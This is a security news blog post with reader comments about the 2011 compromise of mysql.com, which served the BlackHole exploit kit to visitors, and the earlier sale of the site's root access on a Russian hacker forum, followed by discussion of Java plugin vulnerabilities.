Subscribe to RSS
Follow me on Twitter
Join me on Facebook
A security firm revealed today that mysql.com, the central repository for widely-used Web database software, was hacked and booby-trapped to serve visitors with malicious software. The disclosure caught my eye because just a few days ago I saw evidence that administrative access to mysql.com was being sold in the hacker underground for just $3,000.
Web security firm Armorize stated in its blog that mysql.com was poisoned with a script that invisibly redirects visitors to a Web site that uses the BlackHole exploit pack, an automated exploit toolkit that probes visiting browsers for a variety of known security holes.
“It exploits the visitor’s browsing platform (the browser, the browser plugins like Adobe Flash, Adobe PDF, etc, Java, …), and upon successful exploitation, permanently installs a piece of malware into the visitor’s machine, without the visitor’s knowledge,” say the researchers. “The visitor doesn’t need to click or agree to anything; simply visiting mysql.com with a vulnerable browsing platform will result in an infection.”
A screenshot of hacker on an exclusive Russian cybercrime forum selling root access to mysql.com for $3,000
Late last week, I was lurking on a fairly exclusive Russian hacker forum and stumbled upon a member selling root access to mysql.com. As part of his pitch, which was published on the criminal forum Sept. 21, the seller called attention to the site’s daily and monthly stats, and posted screen shots of a root login prompt in a bid to prove his wares.
The seller, ominously using the nickname “sourcec0de,” points out that mysql.com is a prime piece of real estate for anyone looking to plant an exploit kit: It boasts nearly 12 million visitors per month — almost 400,000 per day — and is ranked the 649th most-visited site by Alexa (Alexa currently rates it at 637).
He offered to sell remote access to the first person who paid him at least USD $3,000, via the site’s escrow service, which guarantees that both parties are satisfied with the transaction before releasing the funds.
The ultimate irony of this attack is that the owner of mysql.com is Oracle Corp., which also owns Java, a software suite that I have often advised readers to avoid due to its numerous security and update problems. As I’ve noted in several blog posts, Java exploits are the single most effective attacks used by exploit kits like BlackHole: Currently, four out of nine of the exploits built into BlackHole attack Java vulnerabilities.
Of course, the apparent criminal sale of mysql.com and the subsequent compromise of the site could be just a coincidence. Armorize’s Wayne Huang said the infection was cleaned up not long after the company published its blog post. Huang said it’s not clear how long mysql.com had been compromised, but that it appears the malicious scripts were injected into the site sometime within the last seven hours. If that’s accurate, that was enough time for approximately 120,000 Internet users to browse the site and expose their systems to the exploit kit.
“From our experience, the infection rate is usually pretty high for these drive-by download infections,” Huang said.
Armorize has published a YouTube video (below) that shows what happened when an unpatched browser visited mysql.com during the time it was infected with the drive-by exploit.
Update, Oct. 7, 12:30 a.m. ET: MySQL.com now features the following message, left on Oct. 4. “In light of a recent security incident, customers are advised to update their antivirus definitions and run a full antivirus scan on all computers that accessed the MySQL site between September 20th, 2011 and September 28th, 2011. Also, out of an abundance of caution, we advise MySQL account holders to then change their MySQL account passwords.”
Related posts:
- Nobel Peace Prize Site Serves Firefox 0day
- Hiding from Anti-Malware Search Bots
- Scammers Swap Google Images for Malware
- Criminal Classifieds: Malware Writers Wanted
- Exploit Packs Run on Java Juice
Tags: Alexa, Armorize, java, mysql.com, sourcec0de, Wayne Huang
In the last paragraph, you state ‘unpatched browser’ but I think you mean ‘unpatched Java’. The video shows the use of a java exploit – which is likely independent of the browser.
Well, that’s one way of putting it. But nearly all of these exploit kit attacks target browser plugins, and this is no exception: Java is a standalone application, true, but it also hooks into the browser as a plugin.
I think in this example the JavaScript detected an unpatched version of the Java plugin and exploited a vulnerability that resides in the corresponding Java version/browser plugin. Most of those exploit kits have support for a variety of known vulnerabilities in browsers and browser plugins, Flash, (Adobe) PDF, etc.
RE: https://isc.sans.edu/diary.html?storyid=11638
Last Updated: 2011-09-26 21:50:32 UTC – “… now been cleaned up on mysql .com but no further words on the scope of the compromise. It also appears to be the second time this year*. In the last incident, SQL injection was used to gain access to the information on the site.”
* https://www.scmagazineus.com/oracles-mysqlcom-hacked-via-sql-injection/article/199419/
March 28, 2011
.
Use PDO
On this screen shot from forum it date says
Thu Feb 11 UTC 2010
Jun 21 UTC 2010
Does it mean MySQL.com was compromised over a year and a half?
No, those dates are simply part of the kernel version string for each system, nothing to do with compromise.
No, that’s the date the kernel was built on that MySQL.com box (output from “uname -a”)
Look more closely at the screenshot, the thread was posted September 21, 2011 at 5:43 (and edited at 5:44).
Hidden due to low comment rating. Click here to see.
To be fair, you’re right, but: we already do this anyway. The fundamental flaw is tied into the way browser architecture functions, with Java being the hardest to secure access route to those vulnerabilities. So, is it more sensational to say “Java is a security hole” or to say that “every browser you could use is a security hole?”
The real irony is we’re talking about an SQL venue here, because it’s in that same range of simply being a programing language that can be exploited with malicious intent as well.
Hidden due to low comment rating. Click here to see.
John,
Did you happen to miss the part about how the Web site break in was used to install an exploit kit that exploited Java vulnerabilities more than any other? Not sure how you can say Java is irrelevant here.
Hidden due to low comment rating. Click here to see.
Sorry about misspelling your name, Jon. So you’re a Java developer. I get it.
Just to more fully answer your question, here are the version release notes from the author of the BlackHole exploit kit. See if you can spot how many times he talks about new Java exploits. Finally, check out his sample stats page image to see what a moneymaker Java vulns have been for users of this exploit pack.
“The new version 1.1.0 of innovation – is a complete rewrite. Before issuing the java sploit, it is checking the version of JRE and only if the version is potentially vulnerable is an attempt [made] to punch through and overwrite existing exploits.
java smb no longer asks to install the plugin when approaching the link, and other changes (iepeers) removed because of no relevance
added 2 new exploit java trust (including breaks to 1.6.0_23 – this is the penultimate version at the moment). just added java skyline significantly increased breaking for some types of traffic nearly doubled, this is an example stats…”
http://img31.imageshack.us/img31/3900/screen110.gif
Nothing good to say… java is slow… i havent installed that since many years… even… if i had too… i always removed it… thats a piece of software that i really… dislike…
…was that really you lurking the site? http://blog.trendmicro.com/underground-radar-possible-compromise-of-mysql-com-and-its-subdomains/
Hrm. Jonathan, what are you suggesting?
For Jon, and any other doubters:
http://krebsonsecurity.com/wp-content/uploads/2011/09/mysqlrootforsale0.png
Looks like they are arguing a bit in the thread:
http://img824.imageshack.us/img824/3219/unledweuw.png
Hidden due to low comment rating. Click here to see.
“The reality is that *all* you are talking about is Applets and maybe a bit of the Java WebStart crap. Both of which are effectively dead technology.”
I couldn’t agree more. Unfortunately, this “crap,” “dead” technology is installed on about 80 percent of the computers out there today, even if most people have zero need for it.
Most users aren’t interested in the philosophical and emotional debate you’re having with yourself about what parts of Java are fun and great and which parts aren’t. The average user installs Java and forgets about it.
We can blame Sun for how insecure it has been, and Microsoft for not building a better operating system, but that doesn’t change the fact that the Java program that users have on their systems is a huge liability for non-security conscious users, which describes a majority of the planet, I’m afraid.
Hidden due to low comment rating. Click here to see.
Hidden due to low comment rating. Click here to see.
“good ol’ morals and laws, where are thou” Summarily dismissed as soon as the evidence became compelling that it didn’t work? I’m not interested in a moronic, “bring back hanging” argument. There is so much evidence both by comparing countries today and using historical data that anyone who thinks capital punishment works is, at best, deluded and, at worst, mentally deluded.
Hidden due to low comment rating. Click here to see.
idiot
You should move to Saudi-Arabia
Hidden due to low comment rating. Click here to see.
Great Article as always
. Just figuring out if the Armorize File Monitor was available somewhere to download. Anyone knows?
Thanks
They didn’t say that they were using a VM, but please note that a tool like Armorize (or sysinternal’s procmon – http://technet.microsoft.com/en-us/sysinternals/bb896645 ) won’t protect your system from being ruined. It just lets you see things as they happen until the bad actor starts running, at which point it could stomp all over Armorize or anything else running on the system (well, generally anyway, a privilege escalation attack might be needed to do it completely, but …).
Personally, if I were going to play with fire like this, I’d snapshot a VM and use that, and I’d probably also ensure that the VM host has no privileges and isn’t connected to any private networks. (Yes, you can attack a VM host just as you can attack an OS or a local network, there might be fewer attacks available, but it only takes one.)
I use a VM on linux for this very purpose. I can let a trojan in, disassemble it, and/or let it loose, and then restore the machine back to before it was smashed.
Very handy to get a bunch of tools installed and you always have a clean snapshot ready to go for the next round.
I did something like this when I was quite young (486 era) and had an extra computer that I would just let viruses loose on to see what they did. It was a bitch to have to format and reinstall the OS every time though haha.
Brian, 2 minutes of googling and…
this root was selling on 5 or more forums for 1 week!!!
http://forum.antichat.ru/showthread.php?p=2837158
etc
Oracle do nothing all this time!
What I find frustrating with articles like this one is that it is difficult to know who is vulnerable. Are browsers with Java running on Linux vulnerable? From the Armorize video it appears that the Blackhole exploit pack targets Windows since the video shows .exe files being dropped. But is Blackhole context sensitive, attacking Linux when the victim is running that O/S? It would be really helpful if authors would at least say something about the scope of configurations that can be victimized. Even to say that it is not known whether Linux or Apple or whatever machines are vulnerable would be helpful.
BlackHole, and this attack in general, targets Windows users only.
What is frustrating is that you frequent a BLOG like this and expect Brian to educate you in facets of his BLOG entry. Read from his blog and then research the things you don’t understand. He provides pertinent links to assist with this.
Matter of time…. MOre and more people with inside access will start doing this, I am afraid. Cyver-War is imminent. And nation-states have enough money to create moles and get what they want. That is what happened with the case of mysql.com…That much access to a repository with that much security… Has to be inside…
It is sad how exploitable Java is…Hell, I can create a drive-by link to inject a payload in about 30 seconds… That is how bad java is… It needs to die… Fast.
poor Oracle. tsk tsk tsk…
Very good article and Video! Thank you.
Good video, well done hackers! Shame they cant put their skills to something more constructive.
Windows has always been vulnerable and it always will be. The key here is that a binary file can be downloaded and executed without the users permission. That is ludicrous. Windows basically does not work!
I agree great article. Frankos I think there is a different side but Im not going to debate on hackers anymore. I dont condone what they do. I am just saying the mindset many ways is different. Because they dont come out and hold interviews. Its illegal and wrong. But there are those being paid. They are the ones being paid by companies to do such things. If people want this to stop, then rain in on the companies paying them. Patents aren’t the only thing used in Corporate warfare. Economic Espionage is very prevelant. Cracking is part of that approach. Its unfortunate but its happening
Thanks for the update Brian, I really enjoy reading your blog. It is clear that trusted websites such as mysql.com that involve downloads, no one can be sure of the validity of the links. Organizations need to ensure their network is secured with a network layer Data Leakage Prevention (DLP), which is fast becoming a necessity to prevent the breach of user/corporate data. Any enterprise that captures and distributes data and/or plug-ins needs to become hyper-vigilant. Our company, Wedge Networks has focused on building such solutions for years, and is leading efforts to prevent the good things from flowing out, but especially in this case, prevent bad things from flowing in.
I’d like to thank Wayne Huang for his efforts, and the video, and of course, Brian for bringing it to our attention!